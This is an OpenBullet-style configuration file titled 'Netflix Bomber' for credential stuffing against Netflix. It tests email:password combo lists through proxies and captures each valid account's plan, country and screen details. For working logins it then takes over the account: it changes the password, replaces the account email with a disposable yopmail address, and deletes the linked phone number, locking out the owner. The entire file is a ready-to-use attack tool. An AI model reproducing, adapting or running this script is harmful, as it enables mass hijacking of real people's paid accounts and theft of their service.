[SETTINGS]
{
  "Name": "Netflix Bomber",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2019-05-21T18:28:11.996249+02:00",
  "AdditionalInfo": "",
  "Author": "Itamai",
  "Version": "1.2.6.3 [Paradox Mod]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.netflix.com/ph-en/Login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 

PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" -> VAR "authURL" 

FUNCTION URLEncode "<authURL>" -> VAR "AUTH" 

#Login REQUEST POST "https://www.netflix.com/Login?nextpage=https%3A%2F%2Fwww.netflix.com%2FYourAccount" 
  CONTENT "authURL=<AUTH>&email=<USER>&password=<PASS>&withFields=email%2Cpassword%2CrememberMe%2CnextPage%2CshowPassword&rememberMe=True&flow=websiteSignUp&mode=login&action=loginAction&nextPage=https%3A%2F%2Fwww.netflix.com%2FYourAccount&showPassword=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/ph-en/Login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\":\"unrecognized_email\"},\"" 
    KEY "\"value\":\"incorrect_password\"}" 
  KEYCHAIN Success OR 
    KEY "\"membershipStatus\":\"CURRENT_MEMBER\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"membershipStatus\":\"NEVER_MEMBER\"" 
    KEY "\"membershipStatus\":\"FORMER_MEMBER\"" 

#Subscription PARSE "<SOURCE>" LR "\"currentPlanName\":\"" "\"" -> CAP "Subscription" 

#Country PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "Country" 

#DVD PARSE "<SOURCE>" LR "\"isDVD\":" "," -> CAP "DVD" 

#Trial PARSE "<SOURCE>" LR "\"isInFreeTrial\":" "," -> CAP "Trial" 

#Screens PARSE "<SOURCE>" LR "\"maxStreams\":" "," -> CAP "Screens" 

#HD PARSE "<SOURCE>" LR "\"hasHD\":" "," -> CAP "HD" 

#Ultra_HD PARSE "<SOURCE>" LR "\"hasUHD\":" "," -> CAP "Ultra HD" 

#PARSEauthURL PARSE "<SOURCE>" LR "\"authURL\":\"" "\",\"isDVD\"" -> VAR "authUrlValueTest" 

#Fixedauth FUNCTION Replace "\\x2F" "/" "<authUrlValueTest>" -> VAR "Fixedauth" 

#Fixedauth2 FUNCTION Replace "\\x2B" "+" "<Fixedauth>" -> VAR "Fixedauth2" 

#FIXauth3 FUNCTION Replace "\\x3D" "=" "<Fixedauth2>" -> VAR "Fixedauth3" 

PARSE "<Fixedauth3>" LR "" "" -> VAR "authUrlValue" 

#REQUESTemail REQUEST GET "http://www.yopmail.com/en/email-generator.php" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "readonly=\"readonly\" onmouseup=\"this.select();\" type=\"text\" value=\"" "\"/>" -> VAR "TESTemail" 

FUNCTION Constant "Airb0mber" -> VAR "NEWpass" 

FUNCTION Replace "&#64;" "@" "<TESTemail>" -> VAR "NEWemail" 

#PARSEFIXemail PARSE "<NEWemail>" LR "" "" -> CAP "Email" 

#PARSEFIXpass PARSE "<NEWpass>" LR "" "" -> CAP "Pass" 

REQUEST POST "https://www.netflix.com/api/shakti/vca947ee4/account/info" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"pw_new\":\"<NEWpass>\",\"pw_confirm\":\"<NEWpass>\",\"signout_devices\":false,\"authURL\":\"<authUrlValue>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Referer: https://www.netflix.com/password" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 

REQUEST POST "https://www.netflix.com/api/shakti/vca947ee4/account/info" 
  CONTENT "{\"emailAddress\":\"<NEWemail>\",\"password\":\"<NEWpass>\",\"authURL\":\"<authUrlValue>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Referer: https://www.netflix.com/password" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 

REQUEST POST "https://www.netflix.com/api/shakti/vca947ee4/account/phonenumber" 
  CONTENT "{\"password\":\"<NEWpass>\",\"action\":\"delete\",\"authURL\":\"<authUrlValue>\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Referer: https://www.netflix.com/password" 
  HEADER "Origin: https://www.netflix.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 

